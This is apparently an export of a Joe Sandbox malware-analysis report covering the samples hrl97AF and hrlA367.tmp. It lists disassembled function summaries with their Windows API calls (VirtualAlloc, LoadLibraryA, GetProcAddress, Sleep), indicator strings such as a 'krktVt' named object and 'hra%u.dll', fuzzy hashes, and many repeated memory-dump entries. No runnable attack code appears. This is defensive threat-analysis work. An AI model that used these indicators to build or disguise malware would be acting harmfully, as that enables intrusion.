Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Sleep$CountTickVersionlstrlen
String ID:
API String ID: 1148849038-0
Opcode ID: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction ID: ec02e8e6a0bf6e865ccdbaf95346e43bc2ffc7c41b9a36e3163303f580a99d9a
Opcode Fuzzy Hash: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction Fuzzy Hash: D421D771610215AFDFA47F24881DBEF3A6D9F41341F140946EC0A9A081DBF89F09975D

Function 00402E80 Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON

Download Yara Rule

APIs

#470.MFC42 ref: 00402E9F
SendMessageA.USER32(?,00000027,?,00000000), ref: 00402EBB
#755.MFC42 ref: 00402F1B
#2379.MFC42 ref: 00402F29

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: #2379#470#755MessageSend
String ID:
API String ID: 516545250-0
Opcode ID: 19307cc0112b641f42c05127e240e9b621d2d73733c872dcc2d07d297b7f00d4
Instruction ID: ae483ed0e89d9e4723fdc79b7f6c9c7c3acea37d86427cf1e14bb756db3c141b
Opcode Fuzzy Hash: 19307cc0112b641f42c05127e240e9b621d2d73733c872dcc2d07d297b7f00d4
Instruction Fuzzy Hash: 3D117C712143029BC214DF39DE89D6BBBEAFFD8205F084A2DF58AD32D0DA34E9058B55

Function 00402890 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 004028F5
Sleep.KERNEL32(000001F4), ref: 00402947
Sleep.KERNEL32(000001F4), ref: 0040299A

Strings

X7@, xrefs: 00402895

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Sleep
String ID: X7@
API String ID: 3472027048-2067089342
Opcode ID: 92fada5cfdbc6a922edbaf3abd6bdbc867ed69b1f2908b021d67a98f8e651ac5
Instruction ID: 56058c761996469b055373d7f4e5675fd511cabc212af0c966289d5b43759b51
Opcode Fuzzy Hash: 92fada5cfdbc6a922edbaf3abd6bdbc867ed69b1f2908b021d67a98f8e651ac5
Instruction Fuzzy Hash: EE21F9B12982129BDB00DF71EF08B5A3B66A7D8745F10843EE184762E4CFB95445CFAC

Function 004011F0 Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON

Download Yara Rule

APIs

#324.MFC42(00000066,00000000,?,?,00000000,00405C38,000000FF,004010ED,00000000), ref: 00401214
#1168.MFC42(00000066,00000000,?,?,00000000), ref: 00401227
#1146.MFC42(00000080,0000000E,00000080,00000066,00000000,?,?,00000000), ref: 00401238
LoadIconA.USER32(00000000,00000080), ref: 0040123E

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: #1146#1168#324IconLoad
String ID:
API String ID: 193567849-0
Opcode ID: b0d8ebbce458bee7b7671c312a9a251e003c61d6e3bc7029ecfa220d6c6ff1fb
Instruction ID: 5f364d0ca6f0da87c9e4d08cbfa7f53ff09ba6a78162f9d23447e03a582c3780
Opcode Fuzzy Hash: b0d8ebbce458bee7b7671c312a9a251e003c61d6e3bc7029ecfa220d6c6ff1fb
Instruction Fuzzy Hash: 0CF082B1644B50ABE310DF59CD42B0ABAD8FB04B11F008A2EF591A77C0CBBD95008B59

Function 7FE31079 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0380FF20), ref: 7FE310E8
GetProcAddress.KERNEL32(00000000,7FE31181), ref: 7FE310F3

Strings

.DLL, xrefs: 7FE310DE

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction ID: 5900f217701f080c4111b40af2f692126b674fcdb3668acd741284d8170f4144
Opcode Fuzzy Hash: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction Fuzzy Hash: B301C835D00584EBC7659F38C54DADF3B7BEF08266F800118E5268A455C6F8DA90CFA1

Function 009B1079 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0380FF20), ref: 009B10E8
GetProcAddress.KERNEL32(00000000,009B1181), ref: 009B10F3

Strings

.DLL, xrefs: 009B10DE

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction ID: 1c6890d85a86abcbc6d9420bd22c12546a7e0fbf6ad479b2fc1eb5b9443cc219
Opcode Fuzzy Hash: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction Fuzzy Hash: 77019631104445EBDB78AF3CC75AEEB3B6DEF18362F900414E9258A556C6F48EC08BA5

Function 00401980 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 004019A0

Strings

<6@, xrefs: 00401992
hra%u.dll, xrefs: 0040198C

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: LibraryLoad
String ID: <6@$hra%u.dll
API String ID: 1029625771-964591844
Opcode ID: 2390837fc517bc62a5bb002552fb09d752def2f0a1c79550ccc7e106046599eb
Instruction ID: e7fbf41a89d2fe79915ad9526865f0c88ed692e155a9173a154c572c31764057
Opcode Fuzzy Hash: 2390837fc517bc62a5bb002552fb09d752def2f0a1c79550ccc7e106046599eb
Instruction Fuzzy Hash: C1D0A77059030167D710A770ED4AAA633646B54700F444A3D7686D11D0EABD815CC689

Analysis Process: hrlA367.tmpPID: 3916, Parent PID: 5664COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1497
Total number of Limit Nodes:	5

Executed Functions

Function 0062042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 006204BE
GetVersion.KERNEL32 ref: 00620500
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00620528
CloseHandle.KERNELBASE(?), ref: 006205AD

Strings

\BaseNamedObjects\krktVt, xrefs: 00620708
\BaseNamedObjects\krktVt, xrefs: 00620709, 0062072C, 0062073A
csrs, xrefs: 0062082C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\krktVt$\BaseNamedObjects\krktVt$csrs
API String ID: 3017432202-347219270
Opcode ID: 9a339cd436d9dcaabdfac7e0ef4a3ddf49aaf66cc73df8b107168bbacab3095e
Instruction ID: d5d1b59b2121d74a7099891947e66a799ca06236f1af9dcf9398221eb3284368
Opcode Fuzzy Hash: 9a339cd436d9dcaabdfac7e0ef4a3ddf49aaf66cc73df8b107168bbacab3095e
Instruction Fuzzy Hash: 3DB19C71505669FFFB219F24D80ABEA3BAAEF45710F100028F9099E182C7F49F558F69

Function 0042212D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004221BE
GetVersion.KERNEL32 ref: 00422200
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00422228
CloseHandle.KERNEL32(?), ref: 004222AD

Strings

\BaseNamedObjects\krktVt, xrefs: 00422409, 0042242C, 0042243A
csrs, xrefs: 0042252C
\BaseNamedObjects\krktVt, xrefs: 00422408

Memory Dump Source

Source File: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
